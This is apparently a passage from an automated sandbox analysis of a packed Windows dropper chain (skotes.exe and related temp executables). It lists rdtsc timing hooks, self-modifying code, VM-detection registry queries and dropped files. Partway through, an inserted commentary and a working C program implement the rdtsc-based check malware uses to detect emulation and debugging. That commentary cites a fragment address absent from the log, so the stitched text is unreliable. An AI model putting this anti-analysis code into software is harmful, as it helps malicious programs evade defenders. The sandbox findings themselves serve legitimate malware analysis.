                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83528 second address: A8355F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC5h 0x00000007 jg 00007FF30D194DBEh 0x0000000d jnp 00007FF30D194DB6h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushad 0x0000001b popad 0x0000001c jnc 00007FF30D194DB6h 0x00000022 popad 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8355F second address: A83565 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83565 second address: A8356A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8356A second address: A83572 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83B40 second address: A83B46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83CAB second address: A83CB2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83F76 second address: A83FC4 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FF30D194DB6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF30D194DC5h 0x0000000f jmp 00007FF30D194DC8h 0x00000014 popad 0x00000015 jne 00007FF30D194DDFh 0x0000001b jne 00007FF30D194DBCh 0x00000021 jnc 00007FF30D194DB6h 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a pop eax 0x0000002b rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A83FC4 second address: A83FD7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30CF3CAEFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A87BA7 second address: A87BCD instructions: 0x00000000 rdtsc 0x00000002 jg 00007FF30D194DCBh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A88180 second address: A88184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A869F0 second address: A86A22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FF30D194DBFh 0x0000000e popad 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FF30D194DBDh 0x00000017 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A87186 second address: A8718A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8718A second address: A871AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FF30D194DBCh 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A88266 second address: A8826C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8826C second address: A882A9 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b jmp 00007FF30D194DC5h 0x00000010 pop ecx 0x00000011 jmp 00007FF30D194DBEh 0x00000016 popad 0x00000017 mov eax, dword ptr [esp+04h] 0x0000001b push ebx 0x0000001c jg 00007FF30D194DBCh 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A882A9 second address: A882BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jng 00007FF30CF3CAE6h 0x00000010 pop ebx 0x00000011 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A882BA second address: A882C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A882C0 second address: A882D2 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f push edi 0x00000010 pop edi 0x00000011 pop ebx 0x00000012 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A88420 second address: A88425 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A88425 second address: A8842A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8842A second address: A8843C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jno 00007FF30D194DB8h 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8F4AE second address: A8F4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A8F5FA second address: A8F629 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 jmp 00007FF30D194DC1h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007FF30D194DC3h 0x00000015 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A9120B second address: A9120F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A91481 second address: A91485 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A919BC second address: A919C2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A91C02 second address: A91C0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007FF30D194DB6h 0x0000000a rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A91EF1 second address: A91EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A91FBC second address: A91FC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A92527 second address: A9252E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A93EE2 second address: A93EF2 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnc 00007FF30D194DB6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A93EF2 second address: A93EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A92D54 second address: A92D7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007FF30D194DCFh 0x0000000f rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A92D7C second address: A92D81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A954B8 second address: A954BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A954BC second address: A9551E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 sbb esi, 095CBC00h 0x0000000d push 00000000h 0x0000000f mov esi, dword ptr [ebp+122D33E1h] 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007FF30CF3CAE8h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 0000001Bh 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 je 00007FF30CF3CAF2h 0x00000037 jmp 00007FF30CF3CAECh 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FF30CF3CAF3h 0x00000044 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A9551E second address: A9555E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF30D194DBCh 0x00000008 jg 00007FF30D194DB6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 je 00007FF30D194DC8h 0x00000018 jmp 00007FF30D194DC2h 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FF30D194DC4h 0x00000024 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A96115 second address: A9611A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A96BBA second address: A96BBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A96BBF second address: A96BD2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FF30CF3CAEFh 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A96BD2 second address: A96C36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov esi, dword ptr [ebp+122D3605h] 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push 00000000h 0x00000017 push ecx 0x00000018 call 00007FF30D194DB8h 0x0000001d pop ecx 0x0000001e mov dword ptr [esp+04h], ecx 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc ecx 0x0000002b push ecx 0x0000002c ret 0x0000002d pop ecx 0x0000002e ret 0x0000002f mov si, cx 0x00000032 xchg eax, ebx 0x00000033 pushad 0x00000034 jmp 00007FF30D194DC5h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FF30D194DC7h 0x00000040 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A96C36 second address: A96C3A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A9697C second address: A96997 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF30D194DC7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe RDTSC instruction interceptor: First address: A97E72 second address: A97E79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
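Each "RDTSC instruction interceptor" entry above is one pair of rdtsc executions (the first and second address) together with the instructions the sandbox saw between them. The filler is the packer's junk: pushad/popad and push/pop pairs, conditional jumps to the next instruction, and in two fragments (A648B9 and A96BD2) a call / pop / add [esp+04h] / push / ret sequence that computes its own return address. In many fragments the value just read into edx:eax is immediately overwritten by pop edx / pop eax, so the instruction serves as anti-emulation noise as much as as a timer. The check the sandbox is defeating is the classic one: read the counter twice and treat a large gap as evidence of single-stepping, emulation or an instrumented run, which is why the analysis environment hooks rdtsc and hands back a plausible delta. The following is an added example written for this report, not code from the report or from the analysed sample; the 10000-cycle threshold, the junk loop and the sample count are assumptions, and on non-x86 hosts it falls back to a monotonic nanosecond clock so that it still builds.

```c
#define _POSIX_C_SOURCE 200809L
/* Added example: the two-rdtsc timing check that the interceptor entries
 * are hooking. Not code from the report or the sample; threshold is an
 * assumption chosen for illustration. */
#include <stdint.h>
#include <stdio.h>
#include <time.h>

#if defined(__x86_64__) || defined(__i386__) || defined(_M_X64) || defined(_M_IX86)
#  if defined(_MSC_VER)
#    include <intrin.h>
#  else
#    include <x86intrin.h>
#  endif
#  define HAVE_RDTSC 1
#else
#  define HAVE_RDTSC 0
#endif

static inline uint64_t read_tsc(void)
{
#if HAVE_RDTSC
    return __rdtsc();                    /* edx:eax, the value the packer reads */
#else
    /* non-x86 fallback so the example still builds: monotonic nanoseconds */
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

static volatile uint32_t sink;           /* keeps the junk loop from being optimised away */

/* Same shape as the intercepted fragments: rdtsc, junk, rdtsc. */
uint64_t rdtsc_pair_delta(void)
{
    uint64_t t0 = read_tsc();
    /* stand-in for the pushad/popad, push/pop and never-taken jumps */
    for (int i = 0; i < 16; i++) sink ^= (uint32_t)i * 0x9E3779B9u;
    uint64_t t1 = read_tsc();
    return t1 - t0;                      /* wraps to a huge value if a hook returns t1 < t0 */
}

/* The decision the packer makes on the delta (threshold is an assumption). */
int looks_instrumented(uint64_t delta, uint64_t threshold)
{
    return delta > threshold;
}

/* Take the minimum of several samples so one preemption or interrupt
 * between the two reads does not produce a false positive on bare metal. */
uint64_t min_delta_of(int samples)
{
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < samples; i++) {
        uint64_t d = rdtsc_pair_delta();
        if (d < best) best = d;
    }
    return best;
}

int main(void)
{
    uint64_t d = min_delta_of(32);
    printf("min rdtsc delta over 32 samples: %llu -> %s\n",
           (unsigned long long)d,
           looks_instrumented(d, 10000) ? "instrumented?" : "native-looking");
    return 0;
}
```

An interceptor that returns a constant or a too-small increment makes the delta look native; one that lets the real counter through exposes the instrumentation overhead. A packer can also compare the delta against one recorded at build time, or check that consecutive reads are strictly increasing, which is why the unsigned wrap on t1 < t0 is left in rather than clamped.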
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe Special instruction interceptor: First address: EFE837 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe Special instruction interceptor: First address: EFE8E7 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe Special instruction interceptor: First address: 109BF37 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe Special instruction interceptor: First address: 109C271 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe Special instruction interceptor: First address: 10C78F7 instructions caused by: Self-modifying code
                            Source: C:\Users\user\Desktop\AApUa7VQiy.exe Special instruction interceptor: First address: 11276F3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe Special instruction interceptor: First address: 8DF791 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe Special instruction interceptor: First address: 8DF835 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe Special instruction interceptor: First address: A87D0E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe Special instruction interceptor: First address: 8DD32A instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe Special instruction interceptor: First address: A9CBC0 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\ES0PERDCSSGNQK1XTMK282189FFMR8.exe Special instruction interceptor: First address: B15822 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe Special instruction interceptor: First address: B6EFC3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe Special instruction interceptor: First address: D123C3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe Special instruction interceptor: First address: D39CF2 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe Special instruction interceptor: First address: B6EF20 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe Special instruction interceptor: First address: D1A92D instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exe Special instruction interceptor: First address: D9CEA9 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 8EFC3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 2323C3 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 259CF2 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 8EF20 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 23A92D instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Special instruction interceptor: First address: 2BCEA9 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Special instruction interceptor: First address: 88EA61 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Special instruction interceptor: First address: A5E5B8 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062048001\ktIplF5.exe Special instruction interceptor: First address: AC4D6E instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Special instruction interceptor: First address: 2898DE instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Special instruction interceptor: First address: 2899BC instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Special instruction interceptor: First address: 438BD9 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Special instruction interceptor: First address: 449652 instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exe Special instruction interceptor: First address: 4C273A instructions caused by: Self-modifying code
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                            Source: C:\Users\user\AppData\Local\Temp\1062122001\df1b740bf8.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                            Source: C:\Users\user\AppData\Local\Temp\BEB973FPO2R62ZWABVOVP8TC.exeCode function: 6_2_053E0123 rdtsc 6_2_053E0123
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 407Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 415Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 366Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 419Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 402Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeWindow / User API: threadDelayed 382Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7010
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062128101\9673a0a47c.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\icuuc51.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062133001\6299d9e5a5.exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\libGLESv2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\uninstall\is-2E87P.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\msvcr100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\is-TBCD3.tmp
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\is-M72JG.tmp
Source: C:\Users\user\AppData\Local\Temp\is-QC3FO.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-H9QGA.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\Qt5PrintSupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1062131001\d37c6a3c82.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9H3TYFD3\random[3].exe
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\msvcp100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-45ARK.tmp\f46bdbcca4.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-9ADV0.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-D39IS.tmp\infinity.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Flv to AVI Converter 10.6.0.2004 Free\icuin51.dll (copy)
